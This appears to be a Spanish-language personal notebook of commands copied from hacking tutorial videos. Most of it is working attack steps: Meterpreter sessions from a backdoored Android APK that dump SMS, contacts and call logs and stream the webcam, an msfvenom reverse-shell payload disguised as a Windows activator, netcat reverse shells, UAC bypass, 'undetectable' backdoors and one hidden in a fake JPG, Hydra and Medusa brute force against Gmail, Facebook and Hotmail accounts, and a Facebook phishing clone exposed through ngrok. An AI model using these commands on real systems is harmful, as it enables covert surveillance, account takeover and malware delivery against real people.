clic en guardar una vez creada el apk la vamos a copiar en /var/www/html/descargas/flow.apk activamos el apache service apache2 start 192.168.1.74/descargas o se puede subir a alguna nube para que la persona pueda descargarla service apache2 stop cuando ya la haya descargado clear ahora abrimos metasploit msfconsole -r meterpreter.rc ya con este archivo ya se ha puesto a la escucha para cuando la persona le de instalar a la aplicacion apk 10:53 minutos se activó una sesión le damos enter y nos sale meterpreter>help meterpreter>webcam_list meterpreter>webcam_snap -i 1 meterpreter>help meterpreter>check_root no tenemos privilegios de root descargar las llamadas meterpreter>dump_calllog descargar los contactos meterpreter>dump_contacts descargar mensajes meterpreter>dump_sms obtener la geolocalización del usuario meterpreter>geolocate abre la webcam en tiempo real meterpreter>webcam_stream esto si se traba la conexión ctrl + z background session 1 y msf exploit(multi/handler)> sessions msf exploit(multi/handler)> sessions -i 1 meterpreter>help probamos con la segunda cámara meterpreter>webcam_steram -i 2 ctrl + z background session 1 y msf exploit(multi/handler)> sessions -i 1 meterpreter>help meterpreter>activity_start https://www.facebook.com _________________________________________________________________________ Data Security VIDEO ESCALAR PRIVILEGIOS CON METASPLOIT https://www.youtube.com/watch?v=myDvKC5ziVQ msf>use exploit/multi/handler msf exploit(handler)>set lhost 192.168.1.74 msf exploit(handler)>set lport 4444 msf exploit(handler)>exploit meterpreter>sysinfo meterpreter>getuid Tengo permisos limitados meterpreter>getsystem Esto es para subir privilegios, pero a veces no funciona Como hacemos: Vamos a utilizar un exploit en específico para elevar privilegios meterpreter>background Mandamos la sesión a segundo plano msf exploit(handler)> Abrimos una nueva terminal para buscar el exploit msfconsole -q msf>search uac copiamos el que vamos a utilizar Nos vamos a la otra terminal msf exploit(handler)>use exploit/windows/local/ask msf exploit(ask)>show options msf exploit(ask)>set SESSION 1 msf exploit(ask)>set TECHNIQUE EXE msf exploit(ask)>exploit Va aparecer una ventana de control de usuarios vamos a dar clic en si y ya nos mandó una segunda sesión de meterpreter pero con privilegios meterpreter>sysinfo meterpreter>getuid sigo siendo usuario estandar meterpreter>getsystem Ahora sí subió el privilegio meterpreter>getuid ya sale SYSTEM meterpreter>getsystem -h meterpreter>getuid _________________________________________________________________________ _________________________________________________________________________ Root-701 VIDEO Escalar Privilegios En Metasploit (bypassuac) (Etical Hacking) (Modo Exhaustivo) https://www.youtube.com/watch?v=PaHWJwyYUzk msfdb init service postgresql start msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.74 LPORT=7777 -f exe > /root/Escritorio/activadorwin10.exe msfconsole -q msf>use exploit/multi/handler msf exploit(handler)>set ExitOnSession false msf exploit(handler)>set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler)>set LHOST 192.168.1.74 msf exploit(handler)>set LPORT 7777 exploit -j cd /usr/share/metasploit-framework/ ls cd data/post clear ls En donde se está ejecutando el exploit. El Payload debe de hacerse antes de la explotación Bueno cuando le den doble clic al archivo exe ya se establece una conexión msf exploit(handler)> sessions -i 1 meterpreter> upload /root/Escritorio/activadorwin10.exe C:\\Windows\\Temp meterpreter> upload /usr/share/metasploit-framework/data/post/bypassuac-x86.exe C:\\Windows\\Temp meterpreter>shell c:\Users\Cesar\Desktop>cd C:\Windows\Temp c:\Windows\Temp>dir c:\Windows\Temp>bypassuac-x86.exe elevate ahora ya tenemos shell de admin C:\Windows\System32>cd C:\Windows\Temp C:\Windows\Temp> activadorwin10.exe Se establece una segunda sesión C:\Windows\Temp>exit C:\Windows\Temp>exit meterpreter>background msf exploit(handler)> sessions -i Me muestra las sesiones msf exploit(handler)> sessions -i 2 meterpreter>getsystem meterpreter>getuid ahora soy SYSTEM exit exit exit -y _________________________________________________________________________ Data Security VIDEO INFORMACIÓN INICIAL PARA AUDITORIA DE SEGURIDAD WIFI https://www.youtube.com/watch?v=7uBav8t6APU podemos crear un archivo .rc para automatizar lo creamos en el escritorio entramos en la terminal cd /root/Desktop/ msfconsole -q -r esploit.rc bueno lo que contiene el archivo es exploit.rc es: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.74 set LPORT 4444 exploit -j es importante tener permisos de administrador sessions 2 meterpreter>getuid aquí en esta sesión somos usuario SYSTEM osea administradores meterpreter>clear meterpreter>pwd meterpreter> upload /root/Desktop/wifi.exe C\\Users\\Cesar\\Desktop meterpreter>shell C:\Users\Cesar\Desktop>dir C:\Users\Cesar\Desktop>wifi.exe este archivo wifi.exe me saca todas las wifi a las que se ha conectado con información valiosa con esto estamos haciendo auditoria en redes wifi _________________________________________________________________________ Data Security VIDEO DESCUBRIR SESIONES NULAS HABILITADAS https://www.youtube.com/watch?v=YxCce-5SYBM primero abrimos la terminal y digitamos netdiscover vamos a coger una dirección la 192.168.0.8 hacemos un ping ping 192.168.0.8 ahora vamos a comprobar si el puerto 445 está abierto nmap -p445 --open -n 192.168.0.1/24 nmap -p445 --open -n 192.168.0.8 nos dice que se encuentra abierto ahora vamos a averiguar cual es el sistema operativo de esa dirección ip nmap --script smb-os-discovery.nse -p445 192.168.0.8 es un sistema operativo LINUX Ahora cómo hacemos para saber si tiene sesiones nulas habilitadas enum4linux -t 192.168.0.8 aquí arroja una gran información hay que tener paciencia tenemos que revisar en donde dice session check. puede decir que username ‘’ y password ‘’ osea que se pueden utilizar en blanco. tiene sesiones nulas habilitadas _________________________________________________________________________ METASPLOITABLE https://www.youtube.com/watch?v=cnRJhbYmgnQ https://www.youtube.com/watch?v=vW-agN1t9Rg Metasploitable 1 http://download.vulnhub.com/metasploitable/Metasploitable.zip Metasploitable 2 https://sourceforge.net/projects/metasploitable/ colocar en youtube metasploitable _________________________________________________________________________ Backtrack Academy VIDEO 15 Metasploit y virustotal https://www.youtube.com/watch?v=1xuzeDor8rs Ya debe de haber una sesión lista de meterpreter meterpreter> upload /usr/share/windows-binaries/nc.exe c:\\docs Bueno el antivirus no lo ha detectado meterpreter>background guardar la session msf exploit(badblue_passthru)> search check_malware Es un módulo de post explotación msf exploit(badblue_passthru)>use post/multi/gather/check_malware msf post(check_malware)> show options msf post(check_malware)> set REMOTEFILE c:\\docs\\nc.exe msf post(check_malware)> set session 3 msf post(check_malware)> show options msf post(check_malware)> run Bueno aquí empieza a revisarlos varios antivirus y lo detectan bastantes Ahora lo que vamos hacer es utilizar otro archivo ncat Sirve para tener acceso remoto al sistema Descargamos el .zip Lo movemos mv Downloads/ncat-portable-5-59BETA1.zip /root/Desktop/ cd Desktop ls unzip ncat-portable-5-59BETA1.zip cd ncat-portable-5-59BETA1 ls Ahora vamos a la otra terminal de msf msf post(check_malware)>sessions -i 3 meterpreter>upload /root/Desktop/ncat-portable-5-59BETA1/ncat.exe C:\\docs meterpreter>background msf post(check_malware)> use post/multi/gather/check_malware msf post(check_malware)>show options msf post(check_malware)> set REMOTEFILE c:\\docs\\ncat.exe msf post(check_malware)> run y este archivo son menos virus que lo detectan _________________________________________________________________________ Hacking Libre VIDEO Transferir archivos de Kali Linux a Cualquier Máquina Rápido y Sencillo https://www.youtube.com/watch?v=rstud24Wtlc&t=4s en la parte donde me encuentre van aparecer los archivos y carpetas para descargar y digito en la terminal: python -m SimpleHTTPServer 3030 _________________________________________________________________________ Backtrack Academy VIDEO HackLab - Técnicas de recolección de información https://www.youtube.com/watch?v=TCiTexMKfHU _________________________________________________________________________ Backtrack Academy VIDEO 11 Pivoting accediendo a lugares no autorizados https://www.youtube.com/watch?v=6NYmIrRUDG4 _________________________________________________________________________ _________________________________________________________________________ Backtrack Academy VIDEO HackLab - Post-Explotación con meterpreter https://www.youtube.com/watch?v=HYjo1ui0EFw _________________________________________________________________________ Tutoriales gnu linux VIDEO Como instalar y configurar, metasploitable 2 en virtualbox https://www.youtube.com/watch?v=iMAjLA8UywM Metasploitable 2 es un servidor en modo terminal de ubuntu en el cual presenta muchas vulnerabilidades para poder hacer las prácticas y aprender mucho, en un medio controlado como lo es virtualbox. vamos a instalar metasploitable en virtualbox lo descargamos de internet https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ bueno yo no lo voy a descargar porque ya lo tengo Una vez se haya descargado abrimos virtualbox tenemos que descomprimir metasploitable 2 clic derecho extraer nos vamos a virtualbox clic en nueva le colocamos un nombre: metasploitable 2 El tipo de sistema es Linux en versión elegimos other linux 64bits clic en siguiente elegimos la memoria ram: 512 MB clic en siguiente clic en usar un archivo de disco duro virtual existente y buscamos el archivo de metasploitable 2 y escogemos el tiene extensión .vmdk lo seleccionamos y le damos clic en abrir clic en crear Ahora vamos a configurar algo mas para que quede lista la máquina virtual seleccionamos la máquina virtual metasploitable 2 y clic en configuración en general, clic en avanzado: compartir portapapeles: bidireccional arrastrar y soltar: bidireccional En sistema en la pestaña procesador: debe de estar marcada la opción Habilitar PAE Ahora clic en Red Conectado a: Adaptador puente en donde dice nombre: elegimos wlan0 esto es para escoger la interfaz de red clic en avanzadas en tipo de adaptador elegimos el penúltimo el que dice server en Modo promiscuo elegimos permitir todo y ya tenemos todo configurado clic en aceptar y ahora clic en iniciar Ahora que ya arrancó debemos de colocar El usuario y la contraseña que en este caso es msfadmin las dos _________________________________________________________________________ Carlitostv tutoriales VIDEO Cómo descifrar contraseñas usando john the ripper en kali linux 2019 https://www.youtube.com/watch?v=cH4dPVKDEJY Crakeador John de Riper Veremos como crakear la contraseña de un usuario, utilizando la herramienta john the riper. Se llama John el destripador por que literalmente destripa un archivo que contiene la información de /etc/passwd y /etc/shadow para comparar las contraseñas con el diccionario que tiene Jonh de Riper. unshadow /etc/passwd /etc/shadow > ataque.txt john --format=sha512crypt ataque.txt Bueno comencemos crearemos un nuevo usuario y contraseña useradd maria passwd maria digitar la contraseña 2 veces una vez creado el usuario comenzamos a usar la herramienta unshadow /etc/passwd /etc/shadow > ataque.txt esto nos crea un archivo con la información de esos dos archivos ahora ejecutamos el John de Riper john --format=sha512crypt ataque.txt como podemos ver crakeo la contraseña podemos agregar mas contraseñas cd /usr/share/john ls nano password.lst _________________________________________________________________________ HackerSploit DNS Zone Transfer Tutorial - Dig, Nslookup & Host https://www.youtube.com/watch?v=kdYnSfzb3UA host -t ns zonetransfer.me host -l zonetransfer.me nsztm1.digi.ninja dig zonetransfer.me -t ns dig axfr zonetransfer.me @nsztm1.digi.ninja. nslookup >set type=ns >zonetransfer.me bueno en una consola de windows nslookup >server nsztm1.digi.ninja >set type=any >ls -d zonetransfer.me regresamos a kali ctrl + c dnsrecon -d zonetransfer.me -t axfr _________________________________________________________________________ ParrotSec School VIDEO 09 - Tutorial de netcat https://www.youtube.com/watch?v=JvSDU5ZqVs8 Función de netcat para ver puertos abiertos o cerrados Puerto HTTP nc -nv 192.168.1.74 80 Nos dice que si está abierto. Le mandamos una comilla(‘) para ver cómo responde el servidor Puerto FTP nc -nv 192.168.1.74 21 clear Puerto SMTP correo nc -nv 192.168.1.74 25 FUNCIÓN DE NETCAT PARA CHAT Esto en el servidor nc -nvlp 4444 Ahora en el cliente osea en otra terminal nc -nv 192.168.1.74 4444 Ahora en el servidor digito Desde el servidor y ahora en el cliente Desde el cliente OTRA FUNCIÓN DE NETCAT ES TRANSFERIR ARCHIVOS Hay que crear un archivo en el cliente Enviar_archivo.txt Esto es el servidor nc -nvlp 4444 > archivo_recibido.txt En el cliente nc -nv 192.168.1.74 4444 < Enviar_archivo.txt Ahora desde el servidor cat archivo_recibido.txt Ahora también esto se puede hacer con windows C:\Users\Jhon\Desktop>dir allí está nc.exe C:\Users\Jhon\Desktop>cls Esto es en windows C:\Users\Jhon\Desktop>nc -nvlp 4444 Esto es en Kali nc -nv 192.168.1.75 4444 Hola desde Kali linux Hola desde Windows 10 NETCAT NOS PERMITE ADMINISTRAR UN SISTEMA DE FORMA REMOTA una bin shell En windows nc -nvlp 4444 -e cmd.exe En kali nc -nv 192.168.1.75 4444 Cuando la conexión se establece recibimos la shell de windows C:\Users\Jhon\Desktop>systeminfo PODEMOS ENVIAR UNA REVERSE SHELL DESDE KALI LINUX A WINDOWS En windows nc -nvlp 4444 En kali ncat -nv 192.168.1.75 4444 -e /bin/bash Cuando Kali se conecte a windows. Windows va a ejecutar comandos /bin/bash Ahora estando en windows si ejecutamos whoamy pwd ncat es una versión mejorada de nc, tiene más opciones ncat --help Si nosotros utilizamos nc así solo cualquier snnifer puede descifrar nuestra información Por eso vamos a utilizar ncat para encriptar nuestra información Esto en el servidor kali ncat -lvp 4444 -e /bin/bash --ssl --allow 192.168.1.75 Esto en el cliente ncat -v 192.168.1.74 4444 --ssl ahora en el cliente ejecutamos whoamy id exit ctrl + c Ahora colocamos la dirección ip que queremos permitir acceso ncat -lvp 4444 -e /bin/bash --ssl --allow 192.168.1.80 Si el cliente ahora desea conectarse no va a poder porque no tiene permiso ADEMÁS PODEMOS EJECUTAR UNA SHELL REVERSA DESDE EL SISTEMA CLIENTE HACIA KALI En kali ncat -lvp 4444 --ssl --allow 192.168.1.75 En el cliente ncat -v 192.168.1.74 4444 --ssl -e /bin/bash Al ejecutar en Kali whoamy pwd _________________________________________________________________________ PiensaEnHacking VIDEO curso hacking - netcat https://www.youtube.com/watch?v=obDljL2LguA _________________________________________________________________________ PiensaEnHacking VIDEO netcat windows https://www.youtube.com/watch?v=6UXu4hbr-FY _________________________________________________________________________ Hacking Ético León VIDEO Crear Diccionario de Contraseñas | Cupp | HEL https://www.youtube.com/watch?v=RdwSu1E4wT8 Nos dirigimos a https://github.com/Mebus/cupp Ahora en la terminal git clone https://github.com/Mebus/cupp.git cd cupp ls ./cupp.py ./cupp.py -i >First Name: juan >Surname: lozano >Nickname: Juanito >Birthdate: 10061998 >Partners) name: Maria >Partners) nickname: Mary >Partners) birthdate: 23051998 >Child’s name: >Child’s nickname: >Child’s birthdate >Pet’s name: rufo >Company name: juanitocompany Colocar palabras claves de la victima: Y Futbol, Barcelona, Playstation Agregar caracteres especiales al final de las palabras Y Números random Y leet mode Y cat juan.txt _________________________________________________________________________ Jey Zeta VIDEO ShellFinder, la herramienta para encontrar web shell en los servidores https://www.youtube.com/watch?v=wh763ONd-Y8 nos vamos a github https://github.com/HackingEnVivo/ShellFinder git clone https://github.com/HackingEnVivo/ShellFinder.git Requerimientos tener perl instalado cd ShellFinder ls ./shellfinder.pl o shellfinder.pl > Aquí colocamos la url >https://cemex.com bueno allí empieza a escanear en busca de la webshell cuando la encuentra es en forma de link, ese link lo copiamos y lo pegamos en el navegador y ya podemos ver la información. _________________________________________________________________________ Jey Zeta Subiendo web shell y haciendo Deface https://www.youtube.com/watch?v=Df8CQlBCPGU una vez encontrado la webshell en la url, entonces desde allí podemos subir un index.html _________________________________________________________________________ HackerSploit DMitry - Passive Information Gathering https://www.youtube.com/watch?v=z2EUhV11QB4 dmitry --help dmitry -i 192.168.0.1 Domain: dmitry -w zonetransfer.me Puertos: dmitry -p 192.168.1.1 netcraft: dmitry -n hsploit.com dmitry -e zonetransfer.me dmitry -e bbc.com dmitry -i 192.168.1.1 -o resultadosdmitry.txt cat resultadosdmitry.txt dmitry -wnpe hsploit.com -o resultadodmitry2.txt _________________________________________________________________________ Error 404 Not Found Inyectar payload en apk Original fuera de la red local https://www.youtube.com/watch?v=xu8HBwr_HoA _________________________________________________________________________ Data Security CREAR BACKDOORS EXE TOTALMENTE INDETECTABLES COMPROBADO https://www.youtube.com/watch?v=1VrrrQzs8HM 1. git clone https://github.com/Screetsec/TheFatRat.git 2. cd TheFatRat 3. chmod +x setup.sh && ./setup.sh 4. 5. 6. 7. 8. Extract The lalin-master to your home or another folder chmod +x fatrat chmod +x powerfull.sh And run the tools ( ./fatrat ) Easy to Use just input your number ./fatrat enter para continuar La herramienta cuenta con 13 módulos vamos a elegir el 2 para crear el backdoor indetectable enter set LHOST IP: 192.168.1.8 set LPORT 4444 y esperamos que se cree el archivo backdoor el archivo se encuentra en la carpeta output de fatrat hay que copiarla al escritorio y despues pasarla a nodistribute.com _________________________________________________________________________ Data Security OCULTAR UN BACKDOOR TRAS UNA IMAGEN COBAL STRIKE https://www.youtube.com/watch?v=uQzprfJsTzI _________________________________________________________________________ TrblTech Como poner un backdoor en cualquier aplicacion | ANDROID https://www.youtube.com/watch?v=kHqBui9uSgo _________________________________________________________________________ Lucho Nethunter Ataque de fuerza bruta a Gmail con hydra https://www.youtube.com/watch?v=sJlQbyY9mYk hydra -S -l [email protected] -P /root/Escritorio/password.txt -e ns -V -s 465 smtp.gmail.com smtp Para este ataque sería bueno tener una vpn o un proxy el gmail y otros servidores cuando le están haciendo ese ataque _________________________________________________________________________ Cyber Akuma Fuerza Bruta a mysql con hydra - Kali Linux https://www.youtube.com/watch?v=1yTCDiGfa8M nmap 192.168.1.163 xhydra Pestaña Target en single target: 192.168.1.163 en port: 3306 en protocol: mysql activar show attemps activar Be Verbose Pestaña Password Username List : /root/Escritorio/users.txt Password List: /root/Escritorio/pass.txt Activar try login as password Activar Try empty password Activar Try reverse login Pestaña Tunnig Number of tacks: 1 timeout: 32 no proxy Pestaña Start clic en el botón start ahora ya la encontró probamos abriendo otra terminal mysql -h 192.168.1.163 -u root Pueden haber muchos ataques con hydra: ftp, http, smtp, telnet, mysql, router, rdp, ssh _________________________________________________________________________ Stalin Maza Ataque de Fuerza Bruta con Hydra | Kali Linux | Dani | 2018 https://www.youtube.com/watch?v=Q0UG5L3slDU Creamos el diccionarioSeguridad.txt nano diccionarioSeguridad.txt y digitamos lo siguiente password root user admin administrador stalin sam ctrl + o ctrl + x hydra -L diccionariosSeguridad.txt -P diccionarioSeguridad.txt -f attack.samsclass.info http-get /brute0/ _________________________________________________________________________ Team Whoami medusa e hydra facebook gmail hotmail ftp ssh https://www.youtube.com/watch?v=Pd2fTPZNCN0 Utilización de fuerza bruta herramientas a utilizar medusa e hydra las cuentas que se van a atacar son ftp, ssh, hotmail, gmail, facebook las de ftp y ssh las vamos a probar en la máquina de metasploitable 2 Debemos de activar esa máquina virtual de metasploitable 2 usuario: msfadmin contraseña: msfadmin Vamos a trabajar con hydra hydra Antes de utilizar hydra vamos a ver una herramienta que se llama crunch para crear diccionarios de datos DICCIONARIO crunch hay que colocar el largo de caracteres como mínimo y el largo de caracteres como máximo crunch 5 5 después se colocan los caracteres que voy a utilizar crunch 5 5 aw72@ > /root/Escritorio/dic_prueba.txt es un diccionario corto otro crunch 5 9 aw#n72@ > /root/Escritorio/dic_prueba2.txt ahora manualmente vamos a generar un diccionario con un editor de texto los valores a ingresar son: perro gato perro318579 rinoceronte 1243567698 y lo guardo con el nombre de: dic_fb.txt ahora utilizar el hydra hydra -s 443 -l podemos un usuario en específico -L colocamos una lista de usuarios que esten en un diccionarioUsuarios.txt -p es para el password si lo sabemos -P si es de una lista -f a que pagina vamos a atacar hydra -s 443 -l perro hydra -s 443 -L /root/Escritorio/listaUsuario.txt HYDRA ATAQUE A FACEBOOK hydra -s 443 -l [email protected] -P /root/Escritorio/dic_fb.txt -f www.facebook.com httpsget y enter puede darse el caso que la fuerza bruta en facebook no funciona porque el tiene mucha seguridad con referente a estos ataques cuando se hacen muchas peticiones a una misma cuenta el facebook bloquea y nos puede dar un falso positivo, como así: que nos puede arrojar una contraseña que no es. Entonces hydra no funciona con facebook HYDRA ATAQUE A FTP bueno en el archivo que se creó llamado dic_fb.txt colocamos otra palabra msfadmin hydra -l msfadmin -P /root/Escritorio/dic_fb.txt 192.168.0.22 ftp y aquí si la encuentra y ya no es un falso positivo usuario: msfadmin y contraseña: msfadmin si queremos comprobar si es verdad hacemos un ftp a esa ip ftp 192.168.0.22 21 nos pide el name: msfadmin y el password: msfadmin y se conecta: ftp>ls ftp>exit HYDRA ATAQUE A SSH hydra -l msfadmin -P /root/Escritorio/dic_fb.txt 192.168.0.22 ssh tambien el usuario y la contraseña es msfadmin para ver si es verdad ssh [email protected] y le colocamos la clave que es msfadmin y nos sale un shell de linux con acceso total al sistema exit HYDRA ATAQUE A GMAIL hydra -S -l [email protected] -P /root/Escritorio/dic_fb.txt -s 465 smtp://smtp.gmail.com En este caso funcionó perfectamente MEDUSA ATAQUE A HOTMAIL medusa medusa -h smtp.live.com -u [email protected] -P /root/Escritorio/dic_fb.txt -M smtp Aquí pues hotmail también detecta cuando hay muchas peticiones por fuerza bruta y manda error MEDUSA ATAQUE A FTP medusa -u msfadmin -P /root/Escritorio/dic_fb.txt -h 192.168.0.22 -M ftp MEDUSA ATAQUE A SSH medusa -u msfadmin -P /root/Escritorio/dic_fb.txt -h 192.168.0.22 -M ssh por fuerza bruta es poco ineficiente, porque las claves son robustas La fuerza bruta es un poco tedioso Es bastante inestable ataques reales desencriptar los hashes luego de obtener las bases de datos mediante un sql injection o mediante la obtención de los hashes de Windows, de Mac, de Linux para su posterior crackeo y obtención de la contraseña _________________________________________________________________________ HackWise Las 7 herramientas de H4cking más utilizadas en Kali Linux https://www.youtube.com/watch?v=UKkMP2UFs_s 7 Aircrack-ng: 6 Metasploit 5 BeEF 4 Hydra 3 John the Ripper 2 Wireshark 1 Burp Suite _________________________________________________________________________ Data Security IMPLANTAR BACKDOOR EN UN APK ORIGINAL https://www.youtube.com/watch?v=Mz1cguXu5k0&t=6s _________________________________________________________________________ Data Security OCULTAR BACKDOOR EN FOTOGRAFÍA https://www.youtube.com/watch?v=og7ZqPmOhKY que necesitamos el backdoor, una foto, winrar y toyicon Ejecutamos toy icon este lo que hace es que convierta la imagen en un icono, la imagen original es de extensión jpg. Arrastramos la imagen a la cajita y automáticamente se crea otro archivo con extensión .ico, si le damos clic derecho propiedades vemos que en verdad es un icono Cerramos toyicon Ahora al archivo .ico le cambiamos el nombre a icono Ahora vamos a modificar la puerta trasera con winrar clic derecho a la puerta trasera añadir al archivo Pestaña General le cambiamos el nombre al archivo: autoFino.jpg método de compresión: la mejor Marcar: crear un archivo autoextraible Clic en la Pestaña Avanzado Clic en el botón autoextraible se nos abre una ventana que dice opciones SFX avanzadas Clic en la pestaña Actualizar Clic en extraer y actualizar ficheros Clic en Sobrescribir todos los ficheros Clic en la pestaña instalación Donde dice Ejecutar tras la extracción allí colocamos el nombre del backdoor virus.exe y donde dice Ejecutar antes de la extracción colocamos autoFino.jpg Clic en la pestaña Texto e icono Clic en el segundo botón de examinar y buscamos el icono que creamos al inicio Clic en la pestaña de modos Clic en ocultar todo Clic en aceptar Clic en aceptar y así se genera un archivo con extensión jpg. es bastante indetectable para las personas normales. Cuando a ese archivo se le dé doble clic la foto se verá pero también se ejecuta el virus.exe, y se establecerá una sesión en kali linux. En kali linux debe de estar el handler listo y a la escucha La foto después de verla la pueden cerrar pero no se pierde la sesión que es lo mas interesante. _________________________________________________________________________ Data Security RECUPERAR SESIÓN ROOT EN KALI LINUX https://www.youtube.com/watch?v=Mp2boeZK3k4 Cuando no sabemos la clave de Linux podemos hacer una estrategia para cambiarla: cuando ingresamos la contraseña y no funciona, debemos de reiniciar la máquina Nos vamos a advanced options, le damos enter y presionamos la letra e debemos de buscar una línea con las teclas de flechas que comience con linux y termine en quiet. estando en quiet borramos hacia atrás y llegamos a ro. borramos la o y a la r le anexamos la w osea ro por rw init=/bin/bash después de bash dejamos un espacio y presionamos la tecla f10 y se reinicia la máquina para entrar en modo terminal nos a parecer lo siguiente root@(none):/# y ahora digitamos lo siguiente: root@(none):/# passwd ahora escribimos una nueva contraseña: 12345 12345 ahora reiniciamos la máquina con reboot -f Ahora podemos entrar con el usuario root y la nueva contraseña _________________________________________________________________________ Xecure Labs Fundamentos de Metasploit Framework || Curso de Metasploit - Desde 0 hasta Avanzado || Gratis https://www.youtube.com/watch?v=Ap9mfbmOrLM _________________________________________________________________________ Evitar que el servicio de actualizaciones de Windows 10 se inicie con el sistema Las actualizaciones de Windows 10 se comportan como cualquier proceso. Lo que hay que hacer es impedir que se inicie con el sistema, y para ello es necesario seguir los siguientes pasos: ● Pulsa la tecla de Windows + R, escribe services.msc en la barra de ejecución y pulsa la tecla Enter. ● En la lista de procesos localiza el de Windows Update y ábrelo clicando en él. ● Para desactivarlo, en la pestaña General, busca el campo "Tipo de incio" y cámbialo a "Deshabilitado". ● Reinicia el PC y las actualizaciones automáticas habrán pasado a la historia. Si en algún momento quieres volver a activarlas basta con volver a seguir estos pasos y cambiar el tipo de inicio a "Automático". _________________________________________________________________________ Data Security ASÍ ES COMO LOS HACKERS TE ROBAN TUS CONTRASEÑAS https://www.youtube.com/watch?v=3vKOiRxKqeE&t=473s debemos de entrar a una página web https://ngrok.com allí en ella nos registramos pero usando una cuenta de correo temporal https://temp-mail.org https://emailtemporal.org https://www.mailinator.com bueno después que active el correo temporal me registro en ngrok.com y me descargo el ngrok y sigo los pasos para configurarlo en la terminal ./ngrok http -bind-tls=true 8080 Abrimos otra terminal cd weeman ls ./weeman.py show set url https://www.facebook.com set port 8080 set action_url aquí va la url de ngrok https show run _________________________________________________________________________ Álvaro Solás Post explotación con Meterpreter, escalada de privilegios y obtención de hashes https://www.youtube.com/watch?v=OK-HDvHc_2o _________________________________________________________________________